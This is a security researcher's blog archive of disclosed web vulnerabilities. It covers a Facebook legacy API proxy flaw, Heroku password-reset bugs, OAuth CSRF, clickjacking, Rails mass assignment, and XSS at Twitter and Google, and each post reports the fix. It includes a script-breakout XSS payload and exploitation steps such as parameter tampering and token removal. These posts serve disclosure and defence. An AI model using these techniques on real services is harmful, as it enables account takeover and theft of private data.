Stephen Sclafani

Posts in 'Webappsec'

Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User

July 8th, 2014


A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID, which could be obtained from their profile or through the Graph API. Through REST API calls it was possible to view a user’s private messages, view their private notes and drafts, view their primary email address, update their status, post links to their timeline, post as them to their friends’ or public timelines, comment as them, delete their comments, publish a note as them, edit or delete any of their notes, create a photo album for them, upload a photo for them, tag them in a photo, and like and unlike content for them. All of this could be done without any interaction on the part of the user.

An Interesting Request

When starting a pentest I like to browse the target site with Burp open to get a feel for how the site is structured and to see the requests that the site is making. While browsing Facebook’s mobile site the following request caught my attention:


The request was used to get your bookmarks. The request was interesting for three reasons: it was making an API call rather than a request to a dedicated endpoint for bookmarks; it was being made to a nonstandard API endpoint (i.e. not; the call was not Graph API or FQL. Doing a Google search for bookmarks.get turned up nothing. After some guessing I found that the method notes.get could also be called which returned your notes. Through some more searching I found that the endpoint was using Facebook’s deprecated REST API.

The Facebook REST API

The REST API was the predecessor of Facebook’s current Graph API. All of the documentation for the REST API has been removed from Facebook’s website but I was able to piece together some of it from the Wayback Machine. The REST API consists of methods that can be called by both Web applications (websites) and Desktop applications (JavaScript, mobile, and desktop applications). To make a call an application makes a GET or POST request to the REST API endpoint:



The request consists of the method being called, the application’s API key, a session key for a user, any parameters specific to the method, and a signature. The signature is a MD5 of all of the parameters and either the application’s secret, which is generated along with the API key when the application is registered with Facebook, or a session secret which is returned with a session key for a user. Web applications sign requests with their application secret. Requests signed with the application secret can make calls on behalf of users and to administrative methods. Desktop applications sign requests with a user’s session secret. Requests signed with a session secret are limited to making calls only for that user. This allows Desktop applications to make calls without exposing their application secret (which would have to be embedded in the application). An application obtains a session key for a user through an OAuth like authentication flow.

Making Calls on Behalf of Any User

From reading the documentation I knew that the actual REST API endpoint was which meant that the endpoint had to be acting as a proxy. This raised the question: What Facebook application was it proxying requests as and what permissions did the application have?

So far I had only called read methods. I attempted to call the publishing method users.setStatus:


Calling this method updated the status on the account that I was logged in to. The update was displayed as being made via the Facebook Mobile application:


This is an internal application used by the Facebook mobile website. Many internal Facebook applications are authorized and granted full permissions for every user. I was able to confirm that this was the case for the Facebook Mobile application by calling the methods friends.getAppUsers and fql.query. Calling friends.getAppUsers showed that the application was authorized for every friend on the account that I was logged in to. Calling fql.query allowed me to make a FQL query on the permissions table to lookup the permissions that the application had been granted.

That I was being authenticated with the REST server as the account that I was logged in to meant that the proxy had to be generating a session key from my session and passing it with each request. This should have limited my ability to make calls only for that account, however, I noticed that in the documentation for many of the methods a session key is optional if the method is being called by a Web application (i.e. the request is being signed with the application’s secret). For these methods a uid parameter can be passed in place of a session key and set to the user ID of any user who has authorized the application and granted it the required permission for the method being called.

Through calling users.setStatus I had been able to find out what Facebook application the proxy was using, but more importantly I had been able to confirm that the proxy would pass any parameters to the REST server that I included in a request. The question now was: Was the proxy signing requests with the Facebook Mobile application secret or my session secret? And if the proxy was using the application secret, would the REST server accept the uid parameter? Including the uid parameter in a request would not stop the proxy from also passing a session key and there was the possibility that the REST server would reject the request if both were passed.

To test it I tried updating the status on a different account than the one I was logged in to by calling users.setStatus with the uid parameter set to user ID of that account. It worked. The status on the account whose user ID I passed was updated. Not only was the proxy signing requests with the application secret, but equally as important, when passed both a session key and the uid parameter the REST server would prioritize the uid.

The documentation for the REST API states that the use of the uid parameter is limited to only those users who have authorized the application and granted it the required permission for the method being called. Since the Facebook Mobile application had been authorized and granted full permissions for every user, it was possible to use the uid parameter to make calls on behalf of any user using any of methods that supported it.

The following methods can be called with the uid parameter:

message.getThreadsInFolder Returns all of a user’s messages.
users.setStatus Updates a user’s status. Posts a link to a user’s timeline.
stream.publish Publishes a post to a user’s timeline, friend’s timeline, page, group, or event.
stream.addComment Adds a comment to a post as a user.
stream.removeComment Removes a user’s comment from a post.
notes.create Creates a new note for a user.
notes.edit Edits a user’s note.
notes.delete Deletes a user’s note.

This method is only supposed to delete notes that were created by the user through the application. However, in my tests, when called through the proxy it would delete any note.

photos.createAlbum Creates a new photo album for a user.
photos.upload Uploads a photo for a user.
photos.addTag Tags a user in a photo.
stream.addLike Likes content for a user.
stream.removeLike Unlikes content for a user.

Some methods that required a session key would return additional information when called through the proxy:

users.getInfo Returns information on a user.

This method is only supposed to return the information on the user that is viewable to the calling user. However, when called through the proxy it would return the user’s primary email address regardless of the relationship between the user and the calling user.

notes.get Returns the notes for a user.

This method is only supposed to return the notes for the user that are viewable to the calling user. However, when called through the proxy it would return all of the user’s notes, including their drafts.

In addition to the above user methods, the following administrative methods could be called through the proxy on behalf of the Facebook Mobile application:

admin.getAppProperties Gets the property values set for the application.
admin.setAppProperties Sets the property values for the application.
admin.getRestrictionInfo Returns the demographic restrictions for the application.
admin.setRestrictionInfo Sets the demographic restrictions for the application.
admin.getBannedUsers Returns a list of the users who have been banned from the application.
admin.banUsers Bans users from the application.
admin.unbanUsers Unbans users from the application.
auth.revokeAuthorization Revokes a user’s authorization of the application.
auth.revokeExtendedPermission Revokes a extended permission for a user of the application.
notifications.sendEmail Sends an email to a user as the application.


I reported this issue to Facebook on April 23rd. A temporary fix was in place less than three hours after my report. A bounty of $20,000 was awarded by Facebook as part of their Bug Bounty Program.


April 23,  4:42pm – Initial report sent
April 23,  5:50pm – Request for clarification from Facebook
April 23,  6:08pm – Clarification sent
April 23,  6:49pm – Acknowledgment of issue by Facebook
April 23,  7:38pm – Notification of temporary fix by Facebook
April 23,  8:39pm – Confirmation of temporary fix sent
April 29, 11:03pm – Notification of permanent fix by Facebook
April 30, 12:58am – Confirmation of permanent fix sent
April 30,  8:35pm – Bounty awarded

Part 2 Preview

If you looked at the REST API Authentication guide and thought that there might be vulnerabilities there, you would have been correct. Both the Web and Desktop authentication flows were vulnerable to CSRF issues that led to full account takeover. These issues were less serious than the API endpoint issue as they required a user to load links while logged in to their account. However, the links could be embedded in a web page or anywhere where images can be embedded. I have embedded one as an image in this blog post. Click to display it. If you’re logged in to Facebook I’d have full access to your account (the issue has been fixed). In an actual attack loading the link would not have required a click.

24 CommentsCategories:Webappsec

Obtaining The Primary Email Address Of Any Facebook User

July 9th, 2013

Given only their ID, it was possible to obtain the primary email address of any Facebook user regardless of their privacy settings.

Anyone who has subscribed to a public mailing list knows the problem of members inviting their entire contacts list, including the mailing list, to every new social site and app. This has turned mailing list archives into a Wayback Machine for email notifications. Searching through some old mailing lists I came across a Facebook invitation reminder circa 2010:


Clicking on the link in the email, a sign up page filled in with the list’s address and the name of a person who used the link to sign up for an account was displayed:


The link contained two parameters: “re” and “mid”:

Changing the re parameter did nothing; however, changing parts of the mid parameter resulted in other addresses being displayed. Taking a closer at the parameter, its value was actually a string of values with “G” acting as a delimiter:

59b63a G 5af3107aba69 G 0 G 46

Only the second value was important. The value was an ID associated with the address that the invitation was sent to in hex. A Facebook user’s numerical ID could be put as this value and their primary email address would be displayed. A user’s numerical ID is considered public information and can be obtained from the source of their profile or through the Graph API.


This issue was reported to Facebook on March 22nd and was fixed within 24 hours. A bounty of $3,500 was rewarded as part of their Bug Bounty program.

15 CommentsCategories:Webappsec

Vulnerabilities in Heroku

January 9th, 2013

Recently, while contemplating hosting options for my startup, I decided to take a look at Heroku. Upon signing up, I noticed that Heroku used a two-step sign up process. Multi-step sign up processes are notorious for containing security vulnerabilities, and after taking a closer look at Heroku’s I found that it was possible, given only their user ID, to obtain any user’s email address and to change their password.

Sign Up Vulnerability

In the first step of Heroku’s sign up process a user enters their email address:


Upon submitting the form, the user is sent a confirmation email containing a link to activate their account. The activation link consists of the user’s ID and a token:

Upon loading the activation link, the user is prompted to set a password for their account. The email address that the user entered in the first step is displayed:


When the form is submitted a POST is made containing the user’s ID and the token from the activation link:



If the POST was made with the token parameter removed and the password fields left blank, the resulting error page would display the email address of any user whose ID was put as the value of the “id” parameter:



If the POST was made with the token parameter removed and the password fields filled in, the user’s password would be changed:



Reset Password Vulnerability

A second vulnerability was found in Heroku’s reset password functionality. By modifying the POST request it was possible to reset the password of a random (nondeterministic) user each time that the vulnerability was used.

If a user has forgotten their Heroku password they can use the Reset Password form to reset it:


Upon submitting the form, the user is sent an email containing a link with which they can reset their password. The link consists of an ID:

Upon loading the link, the user is prompted to set a new password for their account:


When the form is submitted a POST is made containing the ID in both the URL and body of the request:



If the POST was made with ID removed from both the URL and body, the password of a random account would be reset and the account automatically logged in to:




I reported these issues to Heroku on December 19. Initial fixes were in place within 24 hours. Heroku asked me to hold off on publishing a public disclosure so that they could do a review of their code which I agreed to.

Update: Heroku’s official response.

Despite finding these vulnerabilities I plan to host my startup at Heroku. Security vulnerabilities happen and Heroku handled the reports well.

Note: All of Heroku’s forms are protected against CSRF with an “authenticity_token” parameter. I removed the parameter from the above examples for clarity.

17 CommentsCategories:Webappsec

CSRF Vulnerability in OAuth 2.0 Client Implementations

April 6th, 2011

OAuth 2.0 is the next generation of the OAuth protocol. OAuth 2.0 has been designed to make implementation simpler for both service providers and clients. Unfortunately, this simplification has led to the implementations of the majority of client websites to be vulnerable to cross-site request forgery.


Facebook is currently the largest service provider using OAuth 2.0. Facebook offers OAuth 2.0 as an authentication option for its API. When a client website that has implemented the Facebook API authenticates a user using OAuth 2.0 the website redirects the user to an authorization URL on Facebook:

The user is prompted by Facebook to login and authorize the website. If authorization is granted the user is redirected to the callback URL in the redirect_uri parameter along with a code:

The website can then exchange the code for an OAuth access token and use the token to make API requests on behalf of the user.

Unlike with OAuth 1.x where a request token is passed through the entire flow, there is nothing that ties the request to authorize with the returned code. An attacker can generate a code for their own Facebook account for a target website and can then get a victim to load the code in the website’s callback URL. If the victim is logged in, the website will automatically use the code to link the victim’s account to the attacker’s Facebook account. If the website has implemented Facebook as a secondary login option the attacker can then login to the victims account using Facebook.

I tested this attack against The New York Times, Photobucket, TripAdvisor, StackOverflow, Digg and Formspring all of which were vulnerable.


The OAuth 2.0 spec defines an optional “state” parameter which clients can use to maintain state between the authorization request and the callback. Clients can use this parameter to protect themselves against this attack by passing a unique-to-user nonce as the value of the parameter when redirecting a user:

The nonce is included with the code in callback if authorization is granted:

A client can then check if the nonce is valid and that it belongs to the logged in user before taking action.


Facebook was notified of this issue in January. Since being notified they have taken the following actions:

  • Notified major developers of the issue.
  • Added a section detailing the issue and the use of the “state” parameter for mitigation to their authentication documentation.
  • Began updating their SDKs to use the “state” parameter.

Beyond Facebook

While Facebook is the largest service provider using OAuth 2.0 this is not a Facebook specific issue. Any website that implements a third party service that uses OAuth 2.0 for authentication can be vulnerable to this attack. In addition to Facebook, members of the OAuth community were notified of this issue and discussion to add details of the issue to the OAuth 2.0 spec is ongoing.

2 CommentsCategories:Webappsec

A Parsing Quirk and a #NewTwitter XSS

October 4th, 2010

I generally don’t blog about individual XSS issues, however, this particular one was made more interesting as it took advantage of a parsing quirk of browsers that I’ve seen increasingly be an issue as web applications become more “application” like with the help of javascript.

In 2009 the Mikeyy worm was able to inject javascript into user profiles by exploiting the lack of a validity check in the custom colors functionality and the lack of sanitation when displaying the custom colors on the profile. In response Twitter added sanitation and has since implemented a check on the validity of custom colors. An attempt to submit invalidly formatted colors results in an error being returned. In addition to setting custom colors a user can upload a custom background image. When the image is uploaded the user’s current colors are also sent. Twitter failed to extend their validity check to this functionality allowing the colors to be set to any arbitrary value. On both the old and new Twitter custom colors are sanitized when displayed on the profile, however, the profile is not the only place on the new Twitter where a user’s colors are used.

On the loading of the new Twitter a call to the javascript function twttr.API._requestCache.inject is made to display the user’s timeline. Passed to this function is the metadata of the most recent tweets made by the users that the user is following. The metadata of a tweet includes much data that is not displayed, including the profile colors of the user who made it. The colors were included unsanitized.

twttr.API._requestCache.inject("statuses/home_timeline",[{'contributor_details': true, 'include_entities': 1}],[{"retweeted":false,"truncated":false,"geo":null,"entities":{"hashtags":[],"user_mentions":[],"urls":[]},"place":null,"retweet_count":null,"source":"web","favorited":false,"contributors":null,"user":{"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","description":null,"geo_enabled":false,"time_zone":null,"following":true,"notifications":false,"profile_sidebar_border_color":"C0DEED","verified":false,"profile_image_url":"","follow_request_sent":false,"profile_use_background_image":true,"profile_background_color":"\"</script><script>alert('XSS')</script>","screen_name":"stephensclafani","profile_background_image_url":"","followers_count":0,"profile_text_color":"333333","protected":false,"show_all_inline_media":false,"profile_background_tile":false,"friends_count":0,"url":null,"name":"Stephen Sclafani","listed_count":0,"statuses_count":1,"profile_link_color":"0084B4","id":1598801,"lang":"en","utc_offset":null,"favourites_count":0,"created_at":"Tue Mar 20 07:11:24 +0000 2007","location":null},"id":25168131043,"coordinates":null,"in_reply_to_screen_name":null,"in_reply_to_user_id":null,"in_reply_to_status_id":null,"text":"xss","created_at":"Tue Sep 2120:38:26 +0000 2010"}], 1);

One might expect the injected javascript not to be executed as it’s within a quoted javascript string and that the injected double quote is escaped with a backslash. However, due to a quirk in browser parsing this is not the case. When a browser parses a document and finds a <script> tag it looks for the following </script> tag and ends the block of javascript even if that </script> tag is within a quoted string. By including a </script> tag before the injected block of javascript, the block of javascript being injected into is ended prematurely. This breaks the quoted string allowing the injected block of javascript to be executed.

#NewTwitter XSS

By combining these two issues it was possible for a user to inject javascript into the timelines’ of all of their followers. Twitter was notified of the two issues and has since deployed fixes for both.

For a second example of the quirk see Mike Bailey’s post on a XSS.

2 CommentsCategories:Webappsec

Ruby on Rails: Secure Mass Assignment

January 4th, 2010

The security implications of mass assignment have been documented since Rails’s inception and yet many applications are still vulnerable. In a survey of the top Rails websites I found that the majority were vulnerable to the issue. At three I was able to gain full admin privileges, at others I was able to gain access to other users’ data, in one case to partial credit card information.

Mass Assignment

@user =[:user])

In the above line of code mass assignment is used to populate a newly created User from the params hash (user submitted data). If no precautions are taken an attacker can pass in their own parameters and set any User attributes.

t.column :admin, :boolean, :default => false, :null => false

Consider an application that has a users table containing an admin column. When creating a new account an attacker can pass in the parameter user[admin] set to 1 and make themselves an admin.

has_many :blog_posts

It’s not only database columns that can be attacked in this fashion. Consider an application that has the above line of code in its User model. Because has_many allows the setting of ids via mass assignment, an attacker can pass in the parameter user[blog_post_ids][] and take control of other users’ blog posts.


Rails provides the class method attr_accessible which takes a whitelist approach to protection. Using attr_accessible you can specify the attributes that can be set and all others will be protected.

Testing for Vulnerability

From a black box perspective its easy to determine if an application is vulnerable by attempting to set an attribute that you know could not exist. In the majority of cases a 500 error will be returned. In a few cases an error page with an error such as “Unable to create account” or “Unable to save settings” was returned.

5 CommentsCategories:Webappsec

Exploiting Unexploitable XSS

May 26th, 2009

XSS that are protected by CSRF protection or where other mitigating factors are present are usually considered to be unexploitable or of limited exploitability. This post details real world examples of exploiting “unexploitable” XSS in Google and Twitter. While the XSS detailed in this post are site specific the methods that were used to exploit them could be applied to other websites with similar implementations. Alex’s (kuza55) Exploiting CSRF Protected XSS served as inspiration for this post.


Google has services deployed across many different domains and subdomains and as a result requires a way to seamlessly authenticate members who are logged in to their Google Account. Google’s solution to this problem is the ServiceLogin URL.

When called by a member who is logged in to their Google Account the URL generates an auth URL and redirects to the particular service.

When the auth URL is loaded the service uses the auth token to log the member in. No verification was done between the service and Google to ensure that the account that the member was being logged in to was actually theirs. It was possible, then for an attacker to generate an auth URL for their account at a service and to use it to log a member in without affecting the member’s Google Account session. Because the member’s Google Account session was untouched it was also possible for the attacker to use the ServiceLogin URL to log the member back into their own account at the service.

Google Sites XSS

On the Google Sites User Settings page a user’s settings were used in a javascript function unsanitized. As a result, it was possible for an attacker to submit a setting with a value that would break out of the function and inject javascript into the page. Since the User Settings form is protected against CSRF, this was a self-only XSS. However, with the ability to log a member into an account and back into their own account the attacker could exploit this issue as if it was a full blown reflected XSS.

Blogger XSS

On the Advanced Settings page for publishing a Blogger blog on a custom domain a javascript function takes the value of the “Your Domain” field and displays it in the “Use a missing files host?” section. This function would display the value unsanitized. If the Advanced Settings form is submitted with javascript as the domain an invalid domain error is returned. On the error page the function is executed on page load which would result in the javascript being reflected on the page. Blogger’s forms are protected against CSRF, however like with the bad domain error message, the error message for using a bad CSRF token is displayed along with the XSS on the error page. This XSS was limited, however, in that to make a successful POST a blog ID belonging to the current logged in member is required. An attacker would have to hard code their exploit for a specific target blog otherwise the POST would be redirected to a login page. The attacker could get around this limitation, however, by logging a member into an account that they had created with a known blog ID which could then be used in the POST to trigger the XSS.

The XSS in Blogger was made easier to exploit due to the error message for using a bad CSRF token being displayed on the same page as the XSS. When the error message is properly displayed on a separate page, reflected XSS that require a POST and are protected by CSRF protection are considered to be unexploitable since it should be impossible for an attacker to know the CSRF token. However, this is not always the case. The implementation of many sites CSRF protection, including the majority of Google services, tie the CSRF token to a member’s account but not to an account’s specific session. Making the token compatible across sessions of the same account. With the ability to log a member into an account and to predict the CSRF token for the account, it becomes possible for an attacker to exploit these XSS as if they were unprotected.

YouTube XSS

At a YouTube member can create paid promotions for their videos. A promotion consists of a frame from the video and three lines of text. On the second step of the promotion creation process, the “Write your Promotion” page, a member is given three frames from their video to choose from and three text fields to enter their three lines of text. When the form is submitted, if the text fields contain invalid characters such as html/javascript an error is returned. On the error page the value of the first text field was used unsanitized in the title and alt attributes of the promotion’s image. YouTube’s forms are protected against CSRF and the error message for using a bad CSRF token is displayed on its own page. However, because YouTube’s CSRF tokens are compatible across sessions of the same account, it was possible for an attacker to exploit this XSS by logging a member into an account that they control.

Since being notified of these XSS Google has fixed the issues. Google has also started deploying protection to prevent the exploitation of auth URLs. The protection has already been deployed at Gmail and Google is looking to extend it to other services.


Twitter XSS

On every Twitter page a member’s language preference is used as a variable in the Google Analytics code. For members who had not yet set a language preference it was possible for an attacker to set it temporarily by using the URL:

The value would be used in the Google Analytics code unsanitized.

Since setting any of the profile settings also sets a language preference, and since settings their profile settings is the first thing most Twitter members do after registering, very few members would have been vulnerable to this XSS.

Twitter, like many sites that have implemented CSRF protection, did not extend the protection to its login page, allowing login CSRF attacks. With a login CSRF attack it would have been possible for an attacker to exploit the XSS by first logging a member into an account that had not yet had its language preference set. However, since using login CSRF destroys a member’s session, this attack would have had limited exploitability.

Twitter has a “Remember me” feature on its login page that when used will remember a member’s session after they have shut down their browser. Different sites implement this feature in different ways. Some sites set the same session cookies but make them persistent if the feature is used, other sites such as Twitter set a unique persistent cookie in addition to the session cookie. If an attacker used a login CSRF attack against a member who had logged in to Twitter using the “Remember me” feature, and in the attack the feature was unused, the member’s session would be overwritten but their “Remember me” cookie would not be. The attacker could then exploit the XSS and either steal the cookie or use it to log the member back into their own account and continue with the attack.

Since being notified of the XSS Twitter has fixed the issue and has extend its CSRF protection to its login page.

12 CommentsCategories:Webappsec

Clickjacking & OAuth

May 4th, 2009

This post details clickjacking and how it poses a serious security threat to OAuth service providers.


Clickjacking is when a visitor to a web page is tricked into clicking on an element that they believe to be harmless when in reality they are clicking on an element on a different website that exposes protected data or grants an attacker access. There are a number of ways to implement a clickjacking attack, but the most common way is to load the target website in a transparent iframe. The iframe is then positioned so that the target element that the attacker wishes a visitor to click on is positioned over a dummy element on the page that the iframe is contained on. Because the iframe is given a higher stack order than the dummy element, when a visitor clicks on the dummy element they are actually clicking on the hidden transparent element.

You can read more on clickjacking from Robert Hansen and Jeremiah Grossman here.


In 3-legged OAuth as the result of an action taken by a User a Consumer requests a Request Token from the Service Provider and then passes that Request Token to the Service Provider’s Authorization URL through redirection. The Service Provider then displays a page prompting the User to approve or deny the Consumer access.


In this example Faji is the Service Provider and Beppa is the Consumer. If Beppa’s developers were malicious they could use a clickjacking attack against Faji’s approval page to trick users into granting their application access.



From the user’s perspective the link appears to be harmless, but in reality when clicked on will grant Beppa access.

This is a basic example, however with a little social engineering it becomes trivial to get a user to click on the dummy element and have the attack go undetected.


There are two solutions to protect against clickjacking each with its own issues.

Service providers can use frame busting scripts to prevent their approval page from being framed. However, due to Internet Explorer’s support of a security=”restricted” attribute on frames they can be disabled in IE. For IE8 Microsoft has announced the support of a X-Frame-Options HTTP response header which can be used by service providers to deny their approval page from rendering in a frame. However IE8 is not yet widely used. One workaround is to require that Internet Explorer users have javascript enabled, however this comes with its own set of issues.

Service providers can require that users authenticate themselves before being shown the approval page, even if they are already signed in to the service. By doing so it becomes impossible for their approval page to be framed since a user’s credentials are not known to Consumers. This can be an inconvenience for some users, however, but more importantly by conditioning users to enter their credentials each time they are redirected from a Consumer it can increase the potential of phishing attacks. Service providers that choose this solution should educate their users about phishing attacks and should provide mechanisms that make it easier for users to confirm the authenticity of their site.


At the time of this post all service providers had been notified.

1 CommentCategories:Webappsec